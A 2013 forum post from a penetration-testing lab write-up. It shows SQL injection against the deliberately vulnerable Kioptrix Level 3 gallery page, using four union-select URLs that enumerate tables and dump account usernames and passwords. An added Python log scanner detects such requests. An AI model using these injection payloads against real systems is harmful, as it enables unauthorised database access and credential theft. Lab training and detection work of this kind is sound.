Praetorian503
Posted January 22, 2013

Description: In this video I will show you how to exploit the Kioptrix Level 3 web application using SQL injection. Kioptrix is a vulnerable web application for penetration testing. In this demo I will cover how to exploit a web application using SQL injection and find the web admin password.

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="dev_accounts"),4,5,6

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password, 0x0A) from dev_accounts),4,5,6

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype, 0x3A, firstname, 0x3A, lastname, 0x3A, email, 0x3A, website, 0x3A, issuperuser, 0x3A, joincode) from gallarific_users),4,5,6

Source: Kioptrix Level 3 Notes *Spoiler Alert*
http://www.securitytube.net/video/6708
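How requests shaped like the ones above look from the web server's side, as an added example that is not part of the original post: a small access-log scanner that flags a non-numeric `id` and the SQL constructs these URLs carry. The log lines, client addresses and the rule that a legitimate `id` is numeric are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; only the gallery.php?id= request shape is from the post.
SAMPLE_LOG = [
    '192.168.0.50 - - [22/Jan/2013:10:00:01 +0000] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 5120',
    '192.168.0.50 - - [22/Jan/2013:10:00:09 +0000] "GET /gallery/gallery.php?id=null%20and%201=2%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),4,5,6 HTTP/1.1" 200 5377',
    '192.168.0.50 - - [22/Jan/2013:10:00:20 +0000] "GET /gallery/gallery.php?id=null+and+1=2+union+select+1,2,(select+group_concat(id,0x3A,username,0x3A,password,0x0A)+from+dev_accounts),4,5,6 HTTP/1.1" 200 5290',
    '192.168.0.51 - - [22/Jan/2013:10:01:00 +0000] "GET /gallery/gallery.php?id=7&sort=union HTTP/1.1" 200 5001',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_MARKERS = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}

def findings(line):
    """Return (client, reasons) for one log line, or None if it does not parse."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qs percent-decodes values and turns '+' into a space,
    # so both encodings of the same payload are inspected alike.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    reasons = set()
    for value in params.get("id", []):
        # Assumption: a legitimate gallery id is a plain decimal number.
        if not re.fullmatch(r"[0-9]+", value):
            reasons.add("non-numeric-id")
    for values in params.values():
        for value in values:
            reasons.update(n for n, rx in SQL_MARKERS.items() if rx.search(value))
    return client, sorted(reasons)

def scan(lines):
    """Keep only the lines that produced at least one finding."""
    parsed = (findings(line) for line in lines)
    return [p for p in parsed if p and p[1]]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, ", ".join(reasons))
```

The last sample line shows why the markers match whole constructs rather than single keywords: `sort=union` alone is not flagged. The type check on `id` is also the simplest server-side fix, since a value that fails it never needs to reach the query.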